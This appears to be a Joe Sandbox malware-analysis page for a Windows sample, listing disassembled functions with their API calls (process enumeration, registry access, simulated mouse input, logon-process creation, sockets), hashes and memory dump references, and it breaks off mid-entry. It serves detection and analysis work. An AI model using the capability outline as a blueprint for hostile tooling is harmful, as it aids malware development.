Part of subcall function 0041D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0041D1D8

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0046A32D
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0046A33A
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0046A345
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0046A354
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0046A360

Strings

Msctls_Progress32, xrefs: 0046A2FE

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: a0e80b4b36f74745d8a732ff1c6da4458f8fff69b2c7d0ed606832bd1b4c196d
Instruction ID: c087a3ff2feba92329301fd61567ed14b88ced6f3f48c980a85726e2cd280ca0
Opcode Fuzzy Hash: a0e80b4b36f74745d8a732ff1c6da4458f8fff69b2c7d0ed606832bd1b4c196d
Instruction Fuzzy Hash: 4911D0B1500219BEEF104F61CC85EEB7F6DFF08398F014115BA08A21A0D7769C22DBA8

Function 0041CCCD Relevance: 9.3, APIs: 6, Instructions: 253COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 0041CCF6
GetWindowRect.USER32(?,?), ref: 0041CD37
ScreenToClient.USER32(?,?), ref: 0041CD5F
GetClientRect.USER32(?,?), ref: 0041CE8C
GetWindowRect.USER32(?,?), ref: 0041CEA5

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: a95f9749c6526a6e85246753ac1fa92aeee7def737737484697f95a748c97b68
Instruction ID: 1cbbbf1eee6a61c32d83d92f802d5fff4e9bef6c0e677c0be53b69fc92052790
Opcode Fuzzy Hash: a95f9749c6526a6e85246753ac1fa92aeee7def737737484697f95a748c97b68
Instruction Fuzzy Hash: 1AB13C79900249DBDF10CFA9C9807EEB7B1FF08310F14956AEC59EB250DB34A991CB69

Function 00461BDF Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00461C18
Process32FirstW.KERNEL32(00000000,?), ref: 00461C26
__wsplitpath.LIBCMT ref: 00461C54

Part of subcall function 00421DFC: __wsplitpath_helper.LIBCMT ref: 00421E3C

_wcscat.LIBCMT ref: 00461C69
Process32NextW.KERNEL32(00000000,?), ref: 00461CDF
CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00461CF1

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
String ID:
API String ID: 1380811348-0
Opcode ID: d9ca964e7b60998e1817c17e534577381b4306b0ccf4c73c7e89f9141338cf87
Instruction ID: 0edaadf84994a2fbf7c439804e0bae43028fdd83e05788a9d6c16c43eb8ecc8b
Opcode Fuzzy Hash: d9ca964e7b60998e1817c17e534577381b4306b0ccf4c73c7e89f9141338cf87
Instruction Fuzzy Hash: 215170B15043009FD720EF25D885EAFB7E8EF88758F04492EF58597291EB74A904CB9A

Function 00462FD6 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00463C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00462BB5,?,?), ref: 00463C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004630AF
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004630EF
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00463112
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046313B
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046317E
RegCloseKey.ADVAPI32(00000000), ref: 0046318B

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 3451389628-0
Opcode ID: c0b6ec0b16362bb6ae81a7af8a1febca1b07ea38654e019c0b412c9860e57b4e
Instruction ID: 5892b1df70f304c10d3e3d6946ecdd82f90192a315b1b5be1dc16ffe62a05a2c
Opcode Fuzzy Hash: c0b6ec0b16362bb6ae81a7af8a1febca1b07ea38654e019c0b412c9860e57b4e
Instruction Fuzzy Hash: B8516A71504240AFC704EF65C881E6EBBF9FF89308F04492EF55597291EB39EA09CB5A

Function 004684DE Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00468540
GetMenuItemCount.USER32(00000000), ref: 00468577
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0046859F
GetMenuItemID.USER32(?,?), ref: 0046860E
GetSubMenu.USER32(?,?), ref: 0046861C
PostMessageW.USER32(?,00000111,?,00000000), ref: 0046866D

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: a46110f41c534e46656af0250ed6f5c62c57e53ba0c7fed20eca81b6107e52c7
Instruction ID: 4a32b333b28820789701f84416726f710a670bfdff4336e242cca42d78ce286a
Opcode Fuzzy Hash: a46110f41c534e46656af0250ed6f5c62c57e53ba0c7fed20eca81b6107e52c7
Instruction Fuzzy Hash: 1751B371E00214AFCF11DF55C941AAEB7F4EF48314F10456EE906B7391EB78AE418B9A

Function 00444AC2 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00444B10
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00444B5B
IsMenu.USER32(00000000), ref: 00444B7B
CreatePopupMenu.USER32 ref: 00444BAF
GetMenuItemCount.USER32(000000FF), ref: 00444C0D
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00444C3E

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 3820e9dfeb55f95e393ec268290b3c8c75943d4e144a9b75cad08b804df57059
Instruction ID: e6a5e1f3890da4a0aceb300d286543e28b665d01a084fc0334bc1157647a2e2d
Opcode Fuzzy Hash: 3820e9dfeb55f95e393ec268290b3c8c75943d4e144a9b75cad08b804df57059
Instruction Fuzzy Hash: 3B51E070A02259EBEF20CF64D888BAEBBF4EF84318F18411EE4159B291D778D940CB19

Function 00458DE2 Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON

Download Yara Rule

APIs

select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,0049DC00), ref: 00458E7C
WSAGetLastError.WSOCK32(00000000), ref: 00458E89
__WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00458EAD
6F6E1E40.WSOCK32(?,?,00000000,00000000), ref: 00458EC5
_strlen.LIBCMT ref: 00458EF7
WSAGetLastError.WSOCK32(00000000), ref: 00458F6A

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: ErrorLast$_strlenselect
String ID:
API String ID: 2217125717-0
Opcode ID: 418caecbc6e56f38cfa77f444c88e018a1f28b76f6477bf0aaadda032fcb286f
Instruction ID: 492fe9b31153af44185be34426d0c69a1573ed1426ef4a2bf17fc750f9245427
Opcode Fuzzy Hash: 418caecbc6e56f38cfa77f444c88e018a1f28b76f6477bf0aaadda032fcb286f
Instruction Fuzzy Hash: 0941E971900104AFC704EB65CD86EAEB7B9AF48315F10466EF916A72D2DF38AE04CB58

Function 0041ABF5 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 0041B34E: GetWindowLongW.USER32(?,000000EB), ref: 0041B35F

BeginPaint.USER32(?,?,?), ref: 0041AC2A
GetWindowRect.USER32(?,?), ref: 0041AC8E
ScreenToClient.USER32(?,?), ref: 0041ACAB
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0041ACBC
EndPaint.USER32(?,?,?,?,?), ref: 0041AD06
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0047E673

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
String ID:
API String ID: 2592858361-0
Opcode ID: c2a53bc7bb2e18bad1d35f1806f8f6d7846a0f0a60bb0c4cf28cf667100e6d41
Instruction ID: bc17de8597850ac8ecd1a7f4a605dc630b75c4cd4743ccb3255f9716c6cbda2d
Opcode Fuzzy Hash: c2a53bc7bb2e18bad1d35f1806f8f6d7846a0f0a60bb0c4cf28cf667100e6d41
Instruction Fuzzy Hash: A541C4706052009FC710DF25DC84FBB7BA8EF5A324F04066EF994872A2D3349895DBAA

Function 0046E397 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(004C1628,00000000,004C1628,00000000,00000000,004C1628,?,0047DC5D,00000000,?,00000000,00000000,00000000,?,0047DAD1,00000004), ref: 0046E40B
EnableWindow.USER32(00000000,00000000), ref: 0046E42F
ShowWindow.USER32(004C1628,00000000), ref: 0046E48F
ShowWindow.USER32(00000000,00000004), ref: 0046E4A1
EnableWindow.USER32(00000000,00000001), ref: 0046E4C5
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0046E4E8

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 7e3eddb813cb98a9bf876ffff83290b2429d92cbf2861423786788bc6264c64e
Instruction ID: e38680d0e56c83b23c7f5844027bfffcbb6f046283c39d97626a6b1eca441d47
Opcode Fuzzy Hash: 7e3eddb813cb98a9bf876ffff83290b2429d92cbf2861423786788bc6264c64e
Instruction Fuzzy Hash: 9A418378601140EFDB25CF36C499B957BE1FF05704F1841BAEA588F2A2DB35E841CB56

Function 004498BA Relevance: 9.1, APIs: 6, Instructions: 100fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 004498D1

Part of subcall function 0041F4EA: std::exception::exception.LIBCMT ref: 0041F51E
Part of subcall function 0041F4EA: __CxxThrowException@8.LIBCMT ref: 0041F533

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00449908
RtlEnterCriticalSection.KERNEL32(?), ref: 00449924
RtlLeaveCriticalSection.KERNEL32(?), ref: 0044999E
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 004499B3
InterlockedExchange.KERNEL32(?,000001F6), ref: 004499D2

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 2537439066-0
Opcode ID: 83b1f9b753ad54886ea1b91ec098c3c4677a062786415882a4ed0891fbc3d2ac
Instruction ID: 6d9c1d8ffcb9c1f7d0860105f5f55980207e4b5724d6ad1e77c4c748931ed47b
Opcode Fuzzy Hash: 83b1f9b753ad54886ea1b91ec098c3c4677a062786415882a4ed0891fbc3d2ac
Instruction Fuzzy Hash: 13319271A00105ABDB00AF95DD85DAF7778FF44310B1480BAE904AB286D738DE15DB68

Function 00459B45 Relevance: 9.1, APIs: 6, Instructions: 99COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,004577F4,?,?,00000000,00000001), ref: 00459B53

Part of subcall function 00456544: GetWindowRect.USER32(?,?), ref: 00456557

GetDesktopWindow.USER32 ref: 00459B7D
GetWindowRect.USER32(00000000), ref: 00459B84
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00459BB6

Part of subcall function 00447A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00447AD0

GetCursorPos.USER32(?), ref: 00459BE2
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00459C44

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: 323fb6abc18116d2f827ac04448a136ccb5cc5ee5b85c66ebd575c10a1bb148f
Instruction ID: 6cc0f5aae42766270b2f120872b1b4917f865e586c391f3cbc7db34d18f04012
Opcode Fuzzy Hash: 323fb6abc18116d2f827ac04448a136ccb5cc5ee5b85c66ebd575c10a1bb148f
Instruction Fuzzy Hash: 2D31E172504309ABD710DF14D849F9BB7E9FF88314F00092EF995E7282D634E908CB96

Function 0043AF64 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0043AFAE
OpenProcessToken.ADVAPI32(00000000), ref: 0043AFB5
746D7ED0.USERENV(?,00000004,00000001), ref: 0043AFC4
CloseHandle.KERNEL32(00000004), ref: 0043AFCF
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0043AFFE
746D7F30.USERENV(00000000), ref: 0043B012

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
String ID:
API String ID: 2621361867-0
Opcode ID: df057fa67cb3837beb8e6d891de21c122c86fc64cd341552d7f9278925da4716
Instruction ID: b7a48fbf2d84a4435ac36968e78f9f79161879e2cb968d09ab52d1702d349b35
Opcode Fuzzy Hash: df057fa67cb3837beb8e6d891de21c122c86fc64cd341552d7f9278925da4716
Instruction Fuzzy Hash: 4F215072541209AFDF019F94DD09FAE7BA9EF48308F14502AFE41A21A1C37A9D21DB65

Function 0046EBF6 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 0041AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0041AFE3
Part of subcall function 0041AF83: SelectObject.GDI32(?,00000000), ref: 0041AFF2
Part of subcall function 0041AF83: BeginPath.GDI32(?), ref: 0041B009
Part of subcall function 0041AF83: SelectObject.GDI32(?,00000000), ref: 0041B033

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0046EC20
LineTo.GDI32(00000000,00000003,?), ref: 0046EC34
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0046EC42
LineTo.GDI32(00000000,00000000,?), ref: 0046EC52
EndPath.GDI32(00000000), ref: 0046EC62
StrokePath.GDI32(00000000), ref: 0046EC72

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: ab6dafa2a8e780bd9416af2acd0d5a58d07b6b6bfcf1382a6565474913d09774
Instruction ID: a9fbaf3aecc94b696b7302446875f4ff34609ecfac3ca3e8697b261464c7832e
Opcode Fuzzy Hash: ab6dafa2a8e780bd9416af2acd0d5a58d07b6b6bfcf1382a6565474913d09774
Instruction Fuzzy Hash: 2B113572401148BFEF029F90DC88EEA7FADEF09364F048526BE089A1B0D7719D55DBA4

Function 0043E19B Relevance: 9.0, APIs: 6, Instructions: 48COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0043E1C0
GetDeviceCaps.GDI32(00000000,00000058), ref: 0043E1D1
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0043E1D8
ReleaseDC.USER32(00000000,00000000), ref: 0043E1E0
MulDiv.KERNEL32(000009EC,?,00000000), ref: 0043E1F7
MulDiv.KERNEL32(000009EC,?,?), ref: 0043E209

Part of subcall function 00439AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00439A05,00000000,00000000,?,00439DDB), ref: 0043A53A

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: CapsDevice$ExceptionRaiseRelease
String ID:
API String ID: 603618608-0
Opcode ID: 100bf36fc0cc57922195767d8ac8667467d734e44cc3b284f00f91914693cef0
Instruction ID: c7a5ca771fd91314f3d855d0b2c07d8d13f392a1f48880b11d21432277bd3176
Opcode Fuzzy Hash: 100bf36fc0cc57922195767d8ac8667467d734e44cc3b284f00f91914693cef0
Instruction Fuzzy Hash: D50184B5E01219BFEF10ABA68C45F5EBFB8EB48351F00446AEE04A73D0D6709C00CB64

Function 00427B47 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 00427B47

Part of subcall function 0042123A: __initp_misc_winsig.LIBCMT ref: 0042125E
Part of subcall function 0042123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00427F51
Part of subcall function 0042123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00427F65
Part of subcall function 0042123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00427F78
Part of subcall function 0042123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00427F8B
Part of subcall function 0042123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00427F9E
Part of subcall function 0042123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00427FB1
Part of subcall function 0042123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00427FC4
Part of subcall function 0042123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00427FD7
Part of subcall function 0042123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00427FEA
Part of subcall function 0042123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00427FFD
Part of subcall function 0042123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00428010
Part of subcall function 0042123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00428023
Part of subcall function 0042123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00428036
Part of subcall function 0042123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00428049
Part of subcall function 0042123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0042805C
Part of subcall function 0042123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0042806F

__mtinitlocks.LIBCMT ref: 00427B4C

Part of subcall function 00427E23: InitializeCriticalSectionAndSpinCount.KERNEL32(004BAC68,00000FA0,?,?,00427B51,00425E77,004B6C70,00000014), ref: 00427E41

__mtterm.LIBCMT ref: 00427B55

Part of subcall function 00427BBD: RtlDeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00427B5A,00425E77,004B6C70,00000014), ref: 00427D3F
Part of subcall function 00427BBD: _free.LIBCMT ref: 00427D46
Part of subcall function 00427BBD: RtlDeleteCriticalSection.KERNEL32(004BAC68,?,?,00427B5A,00425E77,004B6C70,00000014), ref: 00427D68

__calloc_crt.LIBCMT ref: 00427B7A
GetCurrentThreadId.KERNEL32 ref: 00427BA3

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
String ID:
API String ID: 2942034483-0
Opcode ID: fff7101387f9233e62c941087eac264b93e49a4ba47622118098bae08e948c6b
